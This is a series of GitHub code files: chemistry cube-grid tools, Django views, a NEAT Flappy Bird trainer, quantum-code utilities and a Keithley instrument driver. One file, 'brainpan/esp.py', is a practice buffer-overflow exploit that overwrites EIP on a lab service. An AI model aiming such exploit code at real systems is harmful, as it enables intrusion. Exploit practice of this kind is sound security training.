points along `x`, `y` and `z` direction.\n        extension : float, optional\n            The extension of the cube on each side of the molecule.\n        rotate : bool, optional\n            When True, the molecule is rotated so the axes of the cube file are\n            aligned with the principal axes of rotation of the molecule.\n        \"\"\"\n        numbers = molecule.numbers\n        pseudo_numbers = molecule.pseudo_numbers\n        coordinates = molecule.coordinates\n        # calculate center of mass of the nuclear charges:\n        totz = np.sum(pseudo_numbers)\n        com = np.dot(pseudo_numbers, coordinates) / totz\n\n        if rotate:\n            # calculate moment of inertia tensor:\n            itensor = np.zeros([3, 3])\n            for i in range(pseudo_numbers.shape[0]):\n                xyz = coordinates[i] - com\n                r = np.linalg.norm(xyz)**2.0\n                tempitens = np.diag([r, r, r])\n                tempitens -= np.outer(xyz.T, xyz)\n                itensor += pseudo_numbers[i] * tempitens\n\n            _, v = np.linalg.eigh(itensor)\n            new_coordinates = np.dot((coordinates - com), v)\n            axes = spacing * v\n\n        else:\n            # Just use the original coordinates\n            new_coordinates = coordinates\n            # Compute the unit vectors of the cubic grid's coordinate system\n            axes = np.diag([spacing, spacing, spacing])\n\n        # maximum and minimum value of x, y and z coordinates\n        max_coordinate = np.amax(new_coordinates, axis=0)\n        min_coordinate = np.amin(new_coordinates, axis=0)\n        # Compute the required number of points along x, y, and z axis\n        shape = (max_coordinate - min_coordinate + 2.0 * extension) / spacing\n        shape = np.ceil(shape)\n        shape = np.array(shape, int)\n        # Compute origin\n        origin = com - np.dot((0.5 * shape), axes)\n\n        return cls(numbers, pseudo_numbers, coordinates, origin, axes, shape)\n\n    @classmethod\n    def from_cube(cls, fname):\n        r\"\"\"Initialize ``UniformGrid`` class based on the grid specifications of a cube file.\n\n        Parameters\n        ----------\n        fname : str\n            Cube file name with \\*.cube extension.\n        \"\"\"\n        fname = str(fname)\n        if not fname.endswith('.cube'):\n            raise ValueError('Argument fname should be a cube file with *.cube extension!')\n\n        # Extract the specifications of the cubic grid from cube file's header\n        numbers, pseudo_numbers, coordinates, origin, axes, shape = cls._read_cube_header(fname)\n\n        return cls(numbers, pseudo_numbers, coordinates, origin, axes, shape)\n\n    @classmethod\n    def from_file(cls, fname, spacing=0.2, extension=5.0, rotate=True):\n        \"\"\"\n        Initialize ``UniformGrid`` class based on the grid specifications of a file.\n\n        Parameters\n        ----------\n        fname : str\n            Path to molecule's file.\n        spacing : float, optional\n            Increment between grid points along `x`, `y` and `z` direction.\n        extension : float, optional\n            The extension of the cube on each side of the molecule.\n        rotate : bool, optional\n            When True, the molecule is rotated so the axes of the cube file are\n            aligned with the principal axes of rotation of the molecule.\n        \"\"\"\n        # Load file\n        logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')\n        try:\n            mol = Molecule.from_file(str(fname))\n        except IOError as _:\n            try:\n                with path('chemtools.data.examples', str(fname)) as fname:\n                    logging.info('Loading {0}'.format(str(fname)))\n                    mol = Molecule.from_file(str(fname))\n            except IOError as error:\n                logging.info(error)\n        return cls.from_molecule(mol, spacing, extension, rotate)\n\n    @property\n    def numbers(self):\n        \"\"\"Atomic number of the atoms in the molecule.\"\"\"\n        return self._numbers\n\n    @property\n    def pseudo_numbers(self):\n        \"\"\"Pseudo-number of the atoms in the molecule.\"\"\"\n        return self._pseudo_numbers\n\n    @property\n    def coordinates(self):\n        
\"\"\"Cartesian coordinates of the atoms in the molecule.\"\"\"\n return self._coordinates\n\n @property\n def centers(self):\n \"\"\"Cartesian coordinates of the atoms in the molecule.\"\"\"\n return self._coordinates\n\n @property\n def origin(self):\n \"\"\"Cartesian coordinate of the cubic grid origin.\"\"\"\n return self._origin\n\n @property\n def axes(self):\n \"\"\"Array with axes of the cube.\n\n The three vectors, stored as rows of axes array, defining the Cartesian\n coordinate system used to build the cubic grid.\n \"\"\"\n return self._axes\n\n @property\n def shape(self):\n \"\"\"Number of grid points along `x`, `y`, and `z` axis.\"\"\"\n return self._shape\n\n @property\n def npoints(self):\n \"\"\"Total number of grid points.\"\"\"\n return self._npoints\n\n @property\n def points(self):\n \"\"\"Cartesian coordinates of the cubic grid points.\"\"\"\n return self._points\n\n def _log_init(self):\n \"\"\"Log an overview of the cube's properties.\"\"\"\n logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')\n logging.info(\"Initialized cube: {0}\".format(self.__class__))\n logging.info(\"Origin : {0}\".format(self._origin))\n logging.info(\"Axes 1 : {0}\".format(self._axes[0]))\n logging.info(\"Axes 2 : {0}\".format(self._axes[1]))\n logging.info(\"Axes 3 : {0}\".format(self._axes[2]))\n logging.info(\"Shape : {0}\".format(self._shape))\n\n def generate_cube(self, fname, data):\n r\"\"\"Write the data evaluated on grid points into a cube file.\n\n Parameters\n ----------\n fname : str\n Cube file name with \\*.cube extension.\n data : np.ndarray, shape=(npoints,)\n An array containing the evaluated scalar property on the grid points.\n \"\"\"\n if not fname.endswith('.cube'):\n raise ValueError('Argument fname should be a cube file with `*.cube` extension!')\n if data.size != self._npoints:\n raise ValueError('Argument data should have the same size as the grid. ' +\n '{0}!={1}'.format(data.size, self._npoints))\n\n # Write data into the cube file\n with open(fname, 'w') as f:\n # writing the cube header:\n f.write('Cubefile created with HORTON CHEMTOOLS\\n')\n f.write('OUTER LOOP: X, MIDDLE LOOP: Y, INNER LOOP: Z\\n')\n natom = len(self._numbers)\n x, y, z = self._origin\n f.write('{0:5d} {1:11.6f} {2:11.6f} {3:11.6f}\\n'.format(natom, x, y, z))\n rvecs = self._axes\n for i, (x, y, z) in zip(self._shape, rvecs):\n f.write('{0:5d} {1:11.6f} {2:11.6f} {3:11.6f}\\n'.format(i, x, y, z))\n for i, q, (x, y, z) in zip(self._numbers, self._pseudo_numbers, self._coordinates):\n f.write('{0:5d} {1:11.6f} {2:11.6f} {3:11.6f} {4:11.6f}\\n'.format(i, q, x, y, z))\n # writing the cube data:\n num_chunks = 6\n for i in range(0, data.size, num_chunks):\n row_data = data.flat[i:i+num_chunks]\n f.write((row_data.size*' {:12.5E}').format(*row_data))\n f.write('\\n')\n\n def weights(self, method='R'):\n \"\"\"\n Return integration weights at every point on the cubic grid.\n\n Parameters\n ----------\n method : str, optional\n The method for computing the integration weights at every point on the grid. 
Options:\n\n            - 'R' method performs rectangle/trapezoidal rule, without assuming that the function\n              is close to zero at the edges of the grid.\n            - 'R0' method performs rectangle/trapezoidal rule, assuming that the function is\n              very close to zero at the edges of the grid.\n        \"\"\"\n        if method == 'R':\n            volume = np.linalg.norm(self._shape[0] * self._axes[0])\n            volume *= np.linalg.norm(self._shape[1] * self._axes[1])\n            volume *= np.linalg.norm(self._shape[2] * self._axes[2])\n            numpnt = 1.0 * self._npoints\n            weights = np.full(self._npoints, volume / numpnt)\n\n        elif method == 'R0':\n            volume = np.linalg.norm((self._shape[0] + 1.0) * self._axes[0])\n            volume *= np.linalg.norm((self._shape[1] + 1.0) * self._axes[1])\n            volume *= np.linalg.norm((self._shape[2] + 1.0) * self._axes[2])\n\n            numpnt = (self._shape[0] + 1.0) * (self._shape[1] + 1.0) * (self._shape[2] + 1.0)\n            weights = np.full(self._npoints, volume / numpnt)\n\n        else:\n            raise ValueError('Argument method {0} is not known.'.format(method))\n        return weights\n\n    def integrate(self, data, method='R0'):\n        \"\"\"\n        Integrate the data on a cubic grid.\n\n        Parameters\n        ----------\n        data : np.ndarray, shape=(npoints, m)\n            Data at every point on the grid given as an array. The size of axis=0 of this array\n            should equal the number of grid points.\n\n        method : str, default='R0'\n            The method for computing the integration weights at every point on the grid. Options:\n\n            - 'R' method performs rectangle/trapezoidal rule, without assuming that the function\n              is close to zero at the edges of the grid.\n            - 'R0' method performs rectangle/trapezoidal rule, assuming that the function is\n              very close to zero at the edges of the grid.\n        \"\"\"\n        if data.shape[0] != self._npoints:\n            raise ValueError('Argument data should have the same size as the grid for axis=0. 
' +\n '{0}!={1}'.format(data.shape[0], self._npoints))\n value = np.tensordot(self.weights(method=method), data, axes=(0, 0))\n return value\n\n @staticmethod\n def _read_cube_header(fname):\n \"\"\"\n Return specifications of the cubic grid from the given cube file.\n\n Parameters\n ----------\n fname : str\n Cube file name with *.cube extension.\n \"\"\"\n with open(fname) as f:\n # skip the title\n f.readline()\n # skip the second line\n f.readline()\n\n def read_grid_line(line):\n \"\"\"Read a number and (x, y, z) coordinate from the cube file line.\"\"\"\n words = line.split()\n return (\n int(words[0]),\n np.array([float(words[1]), float(words[2]), float(words[3])], float)\n # all coordinates in a cube file are in atomic units\n )\n\n # number of atoms and origin of the grid\n natom, origin = read_grid_line(f.readline())\n # numer of grid points in A direction and step vector A, and so on\n shape0, axis0 = read_grid_line(f.readline())\n shape1, axis1 = read_grid_line(f.readline())\n shape2, axis2 = read_grid_line(f.readline())\n shape = np.array([shape0, shape1, shape2], int)\n axes = np.array([axis0, axis1, axis2])\n\n def read_coordinate_line(line):\n \"\"\"Read atomic number and (x, y, z) coordinate from the cube file line.\"\"\"\n words = line.split()\n return (\n int(words[0]), float(words[1]),\n np.array([float(words[2]), float(words[3]), float(words[4])], float)\n # all coordinates in a cube file are in atomic units\n )\n\n numbers = np.zeros(natom, int)\n pseudo_numbers = np.zeros(natom, float)\n coordinates = np.zeros((natom, 3), float)\n for i in range(natom):\n numbers[i], pseudo_numbers[i], coordinates[i] = read_coordinate_line(f.readline())\n # If the pseudo_number field is zero, we assume that no effective core\n # potentials were used.\n if pseudo_numbers[i] == 0.0:\n pseudo_numbers[i] = numbers[i]\n\n return numbers, pseudo_numbers, coordinates, origin, axes, shape\n","repo_name":"theochem/chemtools","sub_path":"chemtools/utils/cube.py","file_name":"cube.py","file_ext":"py","file_size_in_byte":15321,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"11971103838","text":"from django.core.mail import send_mail\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated, AllowAny, IsAdminUser\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ModelViewSet\nfrom courses.serializers import CourseNameSerializer\nfrom students.models import Student\nfrom students.paginations import CustomPagination\nfrom students.serializers import StudentSerializer\n\n\nclass StudentViewSet(ModelViewSet):\n serializer_class = StudentSerializer\n queryset = Student.objects.all()\n pagination_class = CustomPagination\n\n def create(self, request, *args, **kwargs):\n send_mail(\n 'Welcome to Academlo',\n 'Thanks '+request.data['name'],\n 'mares@academlo.com',\n [request.data['email']],\n fail_silently=False,\n )\n return super().create(request, *args, **kwargs)\n\n def get_queryset(self):\n data = {}\n for key, value in self.request.query_params.items():\n if key == CustomPagination.page_query_param:\n continue\n data[key] = value\n return self.queryset.filter(**data)\n\n def get_permissions(self):\n if self.request.method == 'GET':\n permissions = (AllowAny,)\n elif self.request.method == 'DELETE':\n permissions = (IsAdminUser,)\n else:\n permissions = (IsAuthenticated,)\n\n return [permission() for permission in 
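A usage sketch for UniformGrid (assumes chemtools is installed and that an 'h2o.fchk' file exists; both the file name and the Gaussian test field are illustrative):

import numpy as np
from chemtools.utils.cube import UniformGrid

cube = UniformGrid.from_file('h2o.fchk', spacing=0.2, extension=5.0)

# Any scalar evaluated on cube.points can be written out; a Gaussian bump
# centred on the grid stands in for a real density here.
r2 = np.sum((cube.points - cube.points.mean(axis=0)) ** 2, axis=1)
data = np.exp(-r2)

cube.generate_cube('gaussian.cube', data)  # write the field to a cube file
print(cube.integrate(data, method='R0'))   # rectangle-rule integral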
permissions]\n\n @action(methods=['GET', 'POST', 'DELETE', 'PUT', 'PATCH'], detail=True)\n # ManyToManyField actions\n def course(self, request, pk):\n student = self.get_object()\n\n if request.method == 'GET':\n courses = student.courses.all()\n page = self.paginate_queryset(courses)\n if page:\n serialized = CourseNameSerializer(page, many=True)\n return self.get_paginated_response(serialized.data)\n\n serialized = CourseNameSerializer(student.courses, many=True)\n return Response(status=status.HTTP_200_OK, data=serialized.data)\n","repo_name":"jesusmares82-hub/entregable4","sub_path":"students/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37897267455","text":"import inspect\nimport os\n\nDIRECTION_FORWARDS = 'forwards'\nDIRECTION_REVERSE = 'reverse'\nDIRECTIONS = (DIRECTION_FORWARDS, DIRECTION_REVERSE)\n\n\nclass MigrationError(Exception):\n pass\n\n\nclass Migration:\n\n def __init__(self, depends_on, forwards, reverse):\n self.filename = os.path.splitext(os.path.basename(inspect.stack()[1].filename))[0]\n self.depends_on = depends_on\n self.forwards = forwards\n self.reverse = reverse\n\n def run(self, direction):\n if direction == DIRECTION_FORWARDS:\n self.forwards()\n elif direction == DIRECTION_REVERSE:\n self.reverse()\n else:\n raise MigrationError('Unknown direction')\n","repo_name":"Kelvedler/flask_app","sub_path":"src/elastic_migrations/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39604691045","text":"import socket\n\nfiller = (\"A\" * 524).encode('utf-8')\neip = b\"\\xf3\\x12\\x17\\x31\"\noffset = (\"C\" * 472).encode('utf-8')\nbuffer = (\"D\" * (1500 - len(filler) - len(eip) - len(offset))).encode('utf-8')\n\n#print(type(filler))\n#print(filler)\n#print(type(eip))\n#print(eip)\n\ninput = filler + eip + offset + buffer\n\n#input = input.encode(\"utf-8\")\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n#s.connect((\"192.168.56.101\",9999))\ns.connect((\"192.168.130.10\",9999))\ns.send(input)\ns.close()\nprint(\"done\");","repo_name":"Twigonometry/buffer-overflow-scripts","sub_path":"brainpan/esp.py","file_name":"esp.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2023155702","text":"import pygame\nimport neat\nimport time\nimport os\nimport random\npygame.font.init()\n\nwindowWidth = 500\nwindowHeight = 800\n\ngeneration = 0\n\nbirdImages = [pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bird1.png\"))), pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bird2.png\"))), pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bird3.png\")))]\npipeImage = pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"pipe.png\")))\ngroundImage = pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"base.png\")))\nbackgroundImage = pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bg.png\")))\n\nstatFont = pygame.font.SysFont(\"comicsans\", 50)\n\n\nclass Bird:\n images = birdImages\n maxRotation = 25\n roationVelocity = 20\n animationTime = 5\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.tilt = 0\n self.tickCount = 0\n self.velocity = 0\n self.height = self.y\n self.imageCount = 0\n 
self.image = self.images[0]\n\n def jump(self):\n self.velocity = -10.5\n self.tickCount = 0\n self.height = self.y\n\n def move(self):\n self.tickCount += 1\n\n displacment = self.velocity * self.tickCount + 1.5 * self.tickCount ** 2\n\n if displacment >= 16:\n displacment = 16\n\n if displacment < 0:\n displacment -= 2\n\n self.y = self.y + displacment\n\n if displacment < 0 or self.y < self.height + 50:\n if self.tilt < self.maxRotation:\n self.tilt = self.maxRotation\n else:\n if self.tilt > -90:\n self.tilt -= self.roationVelocity\n\n def draw(self, window):\n self.imageCount += 1\n\n if self.imageCount < self.animationTime:\n self.image = self.images[0]\n elif self.imageCount < self.animationTime * 2:\n self.image = self.images[1]\n elif self.imageCount < self.animationTime * 3:\n self.image = self.images[2]\n elif self.imageCount < self.animationTime * 4:\n self.image = self.images[1]\n elif self.imageCount < self.animationTime * 4 + 1:\n self.image = self.images[0]\n self.imageCount = 0\n\n if self.tilt <= -80:\n self.image = self.images[1]\n self.imageCount = self.animationTime * 2\n\n rotatedImage = pygame.transform.rotate(self.image, self.tilt)\n newRectangle = rotatedImage.get_rect(center=self.image.get_rect(topleft = (self.x, self.y)).center)\n window.blit(rotatedImage, newRectangle.topleft)\n\n def get_mask(self):\n return pygame.mask.from_surface(self.image)\n\n\nclass Pipe:\n gap = 200\n velocity = 5\n\n def __init__(self, x):\n self.x = x\n self.height = 0\n\n self.top = 0\n self.bottom = 0\n self.pipeTop = pygame.transform.flip(pipeImage, False, True)\n self.pipeBottom = pipeImage\n\n self.passed = False\n self.set_height()\n\n def set_height(self):\n self.height = random.randrange(50, 450)\n self.top = self.height - self.pipeTop.get_height()\n self.bottom = self.height + self.gap\n\n def move(self):\n self.x -= self.velocity\n\n def draw(self, window):\n window.blit(self.pipeTop, (self.x, self.top))\n window.blit(self.pipeBottom, (self.x, self.bottom))\n\n def collid(self, bird):\n birdMask = bird.get_mask()\n topMask = pygame.mask.from_surface(self.pipeTop)\n bottomMask = pygame.mask.from_surface(self.pipeBottom)\n\n topOffset = (self.x - bird.x, self.top - round(bird.y))\n bottomOffset = (self.x - bird.x, self.bottom - round(bird.y))\n\n bottomPoint = birdMask.overlap(bottomMask, bottomOffset)\n topPoint = birdMask.overlap(topMask, topOffset)\n\n if bottomPoint or topPoint:\n return True\n return False\n\n\nclass Ground:\n velocity = 5\n width = groundImage.get_width()\n image = groundImage\n\n def __init__(self, y):\n self.y = y\n self.x1 = 0\n self.x2 = self.width\n\n def move(self):\n self.x1 -= self.velocity\n self.x2 -= self.velocity\n\n if self.x1 + self.width < 0:\n self.x1 = self.x2 + self.width\n\n if self.x2 + self.width < 0:\n self.x2 = self.x1 + self.width\n\n def draw(self, window):\n window.blit(self.image, (self.x1, self.y))\n window.blit(self.image, (self.x2, self.y))\n\n\n\ndef draw_window(window, birds, pipes, ground, score, generation, numberOfBirds):\n window.blit(backgroundImage, (0, 0))\n\n for pipe in pipes:\n pipe.draw(window)\n\n text = statFont.render(\"Score: \" + str(score), 1, (255, 255, 255))\n window.blit(text, (windowWidth - 10 - text.get_width(), 10))\n\n text = statFont.render(\"Generation: \" + str(generation), 1, (255, 255, 255))\n window.blit(text, (10, 10))\n\n text = statFont.render(\"Number of Birds: \" + str(numberOfBirds), 1, (255, 255, 255))\n window.blit(text, (10, 50))\n\n ground.draw(window)\n\n for bird in birds:\n 
bird.draw(window)\n\n    pygame.display.update()\n\n\ndef main(genomes, config):\n    global generation\n    generation += 1\n    numberOfBirds = 15\n\n    nets = []\n    ge = []\n    birds = []\n\n    for _, genome in genomes:\n        net = neat.nn.FeedForwardNetwork.create(genome, config)\n        nets.append(net)\n        birds.append(Bird(230, 350))\n        genome.fitness = 0\n        ge.append(genome)\n\n    ground = Ground(730)\n    pipes = [Pipe(600)]\n    window = pygame.display.set_mode((windowWidth, windowHeight))\n    clock = pygame.time.Clock()\n\n    score = 0\n\n    run = True\n    while run:\n        clock.tick(30)\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                run = False\n                pygame.quit()\n                quit()\n\n        pipeIndex = 0\n        if len(birds) > 0:\n            if len(pipes) > 1 and birds[0].x > pipes[0].x + pipes[0].pipeTop.get_width():\n                pipeIndex = 1\n        else:\n            run = False\n            break\n\n        for x, bird in enumerate(birds):\n            bird.move()\n            ge[x].fitness += 0.1\n\n            output = nets[birds.index(bird)].activate((bird.y, abs(bird.y - pipes[pipeIndex].height), abs(bird.y - pipes[pipeIndex].bottom)))\n\n            if output[0] > 0.5:\n                bird.jump()\n\n        addPipe = False\n        remove = []\n        for pipe in pipes:\n            for x, bird in enumerate(birds):\n                if pipe.collid(bird):\n                    ge[x].fitness -= 1\n                    # remove the bird that actually hit the pipe (popping\n                    # without an index would discard the last bird instead)\n                    birds.pop(x)\n                    nets.pop(x)\n                    ge.pop(x)\n                    numberOfBirds -= 1\n\n                if not pipe.passed and pipe.x < bird.x:\n                    pipe.passed = True\n                    addPipe = True\n\n            if pipe.x + pipe.pipeTop.get_width() < 0:\n                remove.append(pipe)\n\n            pipe.move()\n\n        if addPipe:\n            score += 1\n            for genome in ge:\n                genome.fitness += 5\n            pipes.append(Pipe(600))\n\n        for r in remove:\n            pipes.remove(r)\n\n        for x, bird in enumerate(birds):\n            if bird.y + bird.image.get_height() >= 730 or bird.y < 0:\n                birds.pop(x)\n                nets.pop(x)\n                ge.pop(x)\n                numberOfBirds -= 1\n\n        ground.move()\n        draw_window(window, birds, pipes, ground, score, generation, numberOfBirds)\n\n\ndef run(configPath):\n    config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction, neat.DefaultSpeciesSet, neat.DefaultStagnation, configPath)\n\n    population = neat.Population(config)\n\n    population.add_reporter(neat.StdOutReporter(True))\n    stats = neat.StatisticsReporter()\n    population.add_reporter(stats)\n\n    winner = population.run(main, 50)\n\n\nif __name__ == \"__main__\":\n    local_dir = os.path.dirname(__file__)\n    configPath = os.path.join(local_dir, 'config-feedforward.txt')\n    run(configPath)\n\n","repo_name":"drinik618/Flappy-Bird","sub_path":"flappyBird.py","file_name":"flappyBird.py","file_ext":"py","file_size_in_byte":8032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14350390009","text":"\"\"\"useful things\n\"\"\"\nimport numpy as np\nfrom sympy.combinatorics import Permutation\nimport sympy\n\n\n###############################\n### Standard form of a code ###\n###############################\n\n\ndef find_next_pivot(matrix_stab, j, n, rx):\n    \"\"\"find next pivot position\n    \"\"\"\n    for kp in range(j, n):\n        for jp in range(j, rx):\n            if matrix_stab[jp, kp] != 0:\n                return (jp, kp)\n    return (-1, -1)\n\n\ndef standard_form(matrix_stab_in, n, rx):\n    \"\"\"put matrix_stab in standard form\n    \"\"\"\n    matrix_stab = np.array(matrix_stab_in, dtype='uint8')\n    qubitpermutation = Permutation([], size=n)\n\n    for j in range(rx):\n        jp, kp = find_next_pivot(matrix_stab, j, n, rx)\n        if jp == -1:\n            break\n        if j != jp:\n            perm = Permutation([[j, jp]], size=rx)\n            matrix_stab = matrix_stab[np.array([i^perm for i in range(rx)]), :]\n        if j != kp:\n            perm = Permutation([[j, kp]], size=n)\n            matrix_stab = matrix_stab[:, np.array([i^perm 
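main(genomes, config) above doubles as the fitness callback handed to Population.run. The contract neat-python expects is small; a minimal standalone sketch (XOR stands in for the game, and the usual config file is assumed to exist):

import neat

def eval_genomes(genomes, config):
    # neat-python calls this with (genome_id, genome) pairs; the callback's
    # only obligation is to assign genome.fitness, as main() does per bird.
    for genome_id, genome in genomes:
        net = neat.nn.FeedForwardNetwork.create(genome, config)
        genome.fitness = 4.0
        for xi, xo in [((0, 0), 0), ((0, 1), 1), ((1, 0), 1), ((1, 1), 0)]:
            genome.fitness -= (net.activate(xi)[0] - xo) ** 2

# population.run(eval_genomes, 50) would drive it, exactly like run() above.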
for i in range(n)])]\n qubitpermutation = qubitpermutation*perm\n\n for l in range(j+1, rx):\n if matrix_stab[l, j] == 1:\n matrix_stab[l, :] = (matrix_stab[l, :] + matrix_stab[j, :]) % 2\n\n for l in range(j-1, 0, -1):\n for j in range(l):\n if matrix_stab[j, l] == 1:\n matrix_stab[j, :] = (matrix_stab[j, :] + matrix_stab[l, :]) % 2\n\n return matrix_stab, qubitpermutation\n\n\n############################\n### Bravyi Haah matrices ###\n############################\n\nZERO = sympy.GF(2).zero\nONE = sympy.GF(2).one\n\nLMAT = sympy.Matrix([[ZERO, ZERO, ZERO, ZERO, ONE, ONE, ONE, ONE],\n [ZERO, ZERO, ZERO, ZERO, ONE, ONE, ONE, ONE]])\n\nMMAT = sympy.Matrix([[ONE, ONE, ONE, ZERO, ZERO, ZERO],\n [ZERO, ZERO, ZERO, ONE, ONE, ONE]])\n\nS1MAT = sympy.Matrix([[ZERO, ONE, ZERO, ONE, ZERO, ONE, ZERO, ONE],\n [ZERO, ZERO, ONE, ONE, ZERO, ZERO, ONE, ONE],\n [ONE, ONE, ONE, ONE, ONE, ONE, ONE, ONE]])\n\nS2MAT = sympy.Matrix([[ONE, ZERO, ONE, ONE, ZERO, ONE],\n [ZERO, ONE, ONE, ZERO, ONE, ONE],\n [ZERO, ZERO, ZERO, ZERO, ZERO, ZERO]])\n\ndef bravyi_haah_gmat(k):\n \"\"\"Tri-orthogonal matrix from Bravyi-Haah\n \"\"\"\n bigl = np.block([[LMAT] for _ in range(k)]+ [[S1MAT]])\n bigm = sympy.diag(*[MMAT for _ in range(k)])\n bigs2 = np.block([S2MAT for _ in range(k)])\n gmatr = np.block([[bigm], [bigs2]])\n gmat = np.block([bigl, gmatr])\n return sympy.Matrix(gmat)\n\ndef bravyi_haah_stabx(k):\n \"\"\"X-stabilizer matrix from Bravyi-Haah\n \"\"\"\n return np.block([S1MAT] + [S2MAT for _ in range(k)])\n\ndef bravyi_haah_stabz(k):\n \"\"\"Z-stabilizer matrix from Bravyi-Haah\n \"\"\"\n gmat = bravyi_haah_gmat(k)\n gorth = np.array([g.transpose() for g in gmat.nullspace()], dtype='uint8') % 2\n return gorth\n","repo_name":"eddieschoute/circuit-benchmarks","sub_path":"circuit_benchmarks/distillutils.py","file_name":"distillutils.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"14818275264","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\nurlpatterns = [\n url(r'^accounts/', include('registration.backends.simple.urls')),\n url(r'^admin/', admin.site.urls),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n url(r'^', include('homepage.urls')),\n url(r'^coursesessions/', include('coursesessions.urls')),\n url(r'^polls/', include('polls.urls')),\n url(r'^api/polls/', include('polls.api.urls')),\n url(r'^api/sessions/', include('coursesessions.api.urls')),\n]\n\nurlpatterns += staticfiles_urlpatterns()\n","repo_name":"s-wirth/thesis","sub_path":"thesis/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30825800726","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: gryu\r\n\"\"\"\r\n\r\nimport serial\r\nimport numpy as np\r\n\r\n\r\nclass Keithley_2400():\r\n def __init__(self, port, baudrate, parity=serial.PARITY_NONE, bytesize=8, stopbits=1, timeout=1e-1, command_list=[]):\r\n self.port = port\r\n self.baudrate = baudrate\r\n self.parity = parity\r\n self.bytesize = bytesize\r\n self.stopbits = stopbits\r\n self.timeout = timeout\r\n self.command_list = command_list\r\n\r\n if not self._is_on():\r\n raise Exception('No response from Keithley... 
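The Bravyi-Haah G-matrix construction targets tri-orthogonality over GF(2): every pair and every triple of distinct rows must overlap in an even number of columns. A standalone checker sketch (independent of this module's sympy types):

import numpy as np
from itertools import combinations

def is_triorthogonal(G):
    # G is any 0/1 matrix given as rows; parity of the overlaps is what matters.
    rows = [np.asarray(r, dtype=np.uint8) for r in G]
    pairs_ok = all(int(a @ b) % 2 == 0 for a, b in combinations(rows, 2))
    triples_ok = all(int((a * b) @ c) % 2 == 0
                     for a, b, c in combinations(rows, 3))
    return pairs_ok and triples_ok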
'\r\n                            'Check if it is ON '\\\r\n                            'or RESTART !!!') \r\n\r\n    def _is_on(self):\r\n        with serial.Serial(self.port, self.baudrate, timeout=self.timeout) as ser_keithley:\r\n            ser_keithley.write(b'*RST\\r')\r\n            ser_keithley.write(b':STAT:MEAS?\\r')\r\n            response_state = ser_keithley.readline()\r\n            ser_keithley.close()\r\n            return response_state\r\n\r\n    # =============================================================================\r\n    # Scan given single fixed voltage.\r\n    #\r\n    # TODO: RAISE EXCEPTION AND CLOSE SERIAL PORT IF ANY WRITE FAILURE OCCURS,\r\n    # TO PREVENT `SerialException` ERROR.\r\n    #\r\n    # See:\r\n    # https://github.com/charkster/keithley_2308\r\n    # https://stackoverflow.com/questions/53882152/how-to-merge-f-string-with-b-string-in-one-line-usage-in-python\r\n    # =============================================================================\r\n    def single_scan(self, voltage):\r\n        fixed_voltage = str(voltage)\r\n        raw_data = \"\"\r\n\r\n        with serial.Serial(self.port, self.baudrate, bytesize=self.bytesize,\r\n                           parity=self.parity, stopbits=self.stopbits,\r\n                           timeout=self.timeout) as ser_keithley:\r\n            for command in self.command_list:\r\n                # Substitute the requested level into the set-level command\r\n                if command == \":SOUR:VOLT:LEV {0}\\r\":\r\n                    command = command.format(fixed_voltage)\r\n                # The reply to the preceding :READ? is collected right before\r\n                # the output is switched off\r\n                if command == \":OUTP OFF\\r\":\r\n                    raw_data = ser_keithley.read(28) ## byte string output len is 28\r\n                    # sleep(10)\r\n                ser_keithley.write(command.encode('utf-8'))\r\n\r\n            values = [float(i) for i in raw_data.decode('utf-8').strip().split(',')]\r\n            voltage = values[0]\r\n            current = values[1]\r\n            ser_keithley.close()\r\n            return voltage, current\r\n\r\n    # =============================================================================\r\n    # Incremental scan from start to stop voltage every fixed step.\r\n    # =============================================================================\r\n    def incr_scan(self, start_v, stop_v, v_step, nplc, hys=False):\r\n        raw_data = \"\"\r\n        num_of_read = 0\r\n        value_lists = []\r\n        v_list, c_list = [], []\r\n\r\n        if (stop_v - start_v) * v_step < 0:\r\n            v_step = -v_step\r\n            print(\"Swapping v_step polarity + <--> -\")\r\n        trigger_count = int(1 + (stop_v - start_v) / v_step)\r\n        num_of_read = 28 * trigger_count\r\n\r\n        with serial.Serial(self.port, self.baudrate, timeout=self.timeout) as ser_keithley:\r\n            for command in self.command_list:\r\n\r\n                if command == \":READ?\\r\":\r\n                    raw_data = ser_keithley.read(num_of_read)\r\n                    # Convert read values to floats and separate into voltage and current\r\n                    value_lists = [[float(i) for i in\r\n                                    raw_data.decode('ascii').strip().split(',')]]\r\n\r\n                    if hys:\r\n                        ser_keithley.write(b':SOUR:SWE:DIR 